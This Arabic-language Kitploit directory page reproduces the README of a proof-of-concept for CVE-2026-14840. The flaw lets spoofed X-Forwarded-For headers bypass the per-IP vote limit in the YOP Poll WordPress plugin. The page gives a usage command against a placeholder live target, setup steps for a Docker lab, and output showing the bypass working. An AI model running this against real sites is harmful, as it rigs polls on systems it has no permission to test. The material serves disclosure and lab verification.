Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-14840 — استغلال إثبات المفهوم لتجاوز حد التصويت في إضافة ووردبريس باستخدام ترويسات X-Forwarded-For المزوّرة؛ يُرفق مختبر Docker للتحقق من CVE-2026-14840 على مواقع ووردبريس المصرّح بها. | Kitploit
أدوات/GitHubGitHub/nullwhisper/cve-2026-14840
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقمختبرات وتدريب عملي
GitHubnullwhisper/cve-2026-14840

CVE-2026-14840

استغلال إثبات المفهوم لتجاوز حد التصويت في إضافة ووردبريس باستخدام ترويسات X-Forwarded-For المزوّرة؛ يُرفق مختبر Docker للتحقق من CVE-2026-14840 على مواقع ووردبريس المصرّح بها.

عرض المستودع
1منذ 28 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-14840 — تجاوز حد التصويت في YOP Poll < 7.0.6

المؤلف: nullwhisper
حالة الاستخدام: بحث أمني مصرح به / التحقق من الثغرات فقط.

ما هذا؟

إصدارات إضافة YOP Poll الأقدم من 7.0.6 تفرض حدًا للتصويت بصوت واحد لكل IP. المشكلة أنها، للحصول على IP العميل، تفحص HTTP_CLIENT_IP و HTTP_X_FORWARDED_FOR قبل REMOTE_ADDR. كلا الترويسين يتحكم فيهما المهاجم، لذا يمكن لمستخدم غير مصادق تزوير IP جديد في كل طلب والإدلاء بعدد غير محدود من الأصوات.

  • CVE: CVE-2026-14840
  • المنتج: إضافة YOP Poll لـ WordPress
  • الإصدارات المتأثرة: < 7.0.6
  • الإصلاح: 7.0.6
  • النوع: تجاوز التحكم في الوصول
  • CVSS: 5.3

المراجع

  • WPScan: https://wpscan.com/vulnerability/fc810ca2-3f27-414d-b94a-68842925b7c6/
  • CVE Record: https://www.cve.org/CVERecord?id=CVE-2026-14840
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-14840
  • الملفات

    root@kitploit:~
    .
    ├── cve_2026_14840_poc.py   # Main PoC
    │   ├── docker-compose.yml  # WordPress lab
    │   └── setup.php           # Creates a poll + public test page
    ├── requirements.txt
    └── README.md
    

    التثبيت

    root@kitploit:~
    pip3 install -r requirements.txt
    

    الاستخدام

    هدف مباشر

    root@kitploit:~
    python3 cve_2026_14840_poc.py -u https://target.com/page-with-poll -n 10
    

    -n هو عدد الأصوات التي سيتم الإدلاء بها. إذا تم قبول أكثر من صوت واحد، فإن الهدف عرضة للثغرة.

    يقوم السكربت تلقائيًا بالرجوع إلى ?rest_route=/yop-poll/v1/votes عندما يستخدم الموقع الروابط الدائمة العادية في WordPress ويعيد /wp-json/... محتوى HTML.

    مختبر محلي

    1. قم بتنزيل الإضافة المعرضة للثغرة (لا تعِد توزيع الملف الثنائي للإضافة):

      root@kitploit:~
      mkdir -p lab/yop-poll
      cd lab/yop-poll
      wget https://downloads.wordpress.org/plugin/yop-poll.7.0.5.zip
      unzip yop-poll.7.0.5.zip && rm yop-poll.7.0.5.zip
      cd ../..
      
    2. شغّل المختبر:

      root@kitploit:~
      cd lab
      docker compose up -d
      
    3. أكمل عملية تثبيت WordPress على الرابط http://127.0.0.1:8090.

    4. أنشئ الاستطلاع وصفحة الاختبار:

      root@kitploit:~
      docker exec -i lab-wpcli-1 php /tmp/setup.php
      
    5. شغّل الـ PoC:

      root@kitploit:~
      python3 cve_2026_14840_poc.py -u 'http://127.0.0.1:8090/?page_id=4' -n 5
      

    تم التحقق على localhost

    تم الاختبار على WordPress 6.8 + YOP Poll 7.0.5 مع الروابط الدائمة العادية الافتراضية.

    نفس IP ثلاث مرات — الحد يعمل:

    root@kitploit:~
    #1 201 -> Vote recorded successfully.
    #2 403 -> You have already voted on this poll.
    #3 403 -> You have already voted on this poll.
    

    IP مختلف في كل طلب عبر X-Forwarded-For — التجاوز يعمل:

    root@kitploit:~
    #1 201 -> Vote recorded successfully.
    #2 201 -> Vote recorded successfully.
    #3 201 -> Vote recorded successfully.
    

    ينمو جدول wp_yoppoll_votes بمقدار صف واحد لكل IP مزور، مما يؤكد تجاوز الحد المفروض لكل IP.

    لماذا لا يتم تضمين الإضافة

    يحتوي هذا المستودع على ملفات الـ PoC وملفات تنسيق المختبر فقط. إضافة YOP Poll مرخصة بموجب GPL-2.0+، لكن توزيع نسخة كاملة منها غير ضروري، ويضخّم المستودع، وقد يسبب مشاكل. نزّل الإصدار 7.0.5 من WordPress.org لمختبرك الخاص.

    إخلاء مسؤولية

    هذه الأداة مخصصة لاختبار الأمان والبحث المصرح بهما فقط. لا تستخدمها ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها. المؤلف غير مسؤول عن إساءة الاستخدام أو الأضرار الناجمة عن هذا الكود.

    تنزيل الأداة